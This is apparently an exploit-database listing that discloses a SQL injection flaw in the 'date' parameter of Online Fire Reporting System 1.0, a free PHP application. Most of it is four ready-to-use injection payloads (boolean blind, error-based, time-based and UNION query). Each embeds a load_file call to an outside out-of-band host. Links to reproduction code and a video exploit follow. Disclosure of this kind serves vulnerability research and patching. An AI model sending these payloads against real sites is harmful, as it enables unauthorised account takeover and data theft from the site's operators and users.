Online Fire Reporting System 1.0 SQL injection Vulnerability

🗓️ 24 May 2022 00:00:00Reported by nu11secur1tyType

zdt🔗 0day.today👁 271 Views

Online Fire Reporting System 1.0 SQL injection Vulnerability. The 'date' parameter is susceptible to SQL injection attacks, enabling an attacker to seize administrator and user accounts and download system information

## Title: Online Fire Reporting System 1.0 SQLi 
## Author: nu11secur1ty
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting



## Description:
The `date` parameter appears to be vulnerable to SQL injection attacks. 
The payload '+(select load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+' was submitted in the `date` parameter. 
The attacker can take administrator accounts control and also of all accounts on this system, also the malicious user can download all information about this system.

Status: CRITICAL

[+] Payloads:

```mysql
---
Parameter: date (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: page=reports&date=2022-05-24'+(select load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'' OR NOT 3052=3052 AND 'yrRg'='yrRg

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=reports&date=2022-05-24'+(select load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'' AND (SELECT 8940 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT (ELT(8940=8940,1))),0x7162767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ATCs'='ATCs

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=reports&date=2022-05-24'+(select load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'' AND (SELECT 9304 FROM (SELECT(SLEEP(5)))aaXF) AND 'lAbH'='lAbH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: page=reports&date=2022-05-24'+(select load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170766b71,0x6d464b4556785048787241587a49795869777141684b4d5252784244626f77424b514675714f7349,0x7162767171),NULL,NULL,NULL#
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting)

## Proof and Exploit:
[href](https://streamable.com/spoy07)

24 May 2022 00:00Current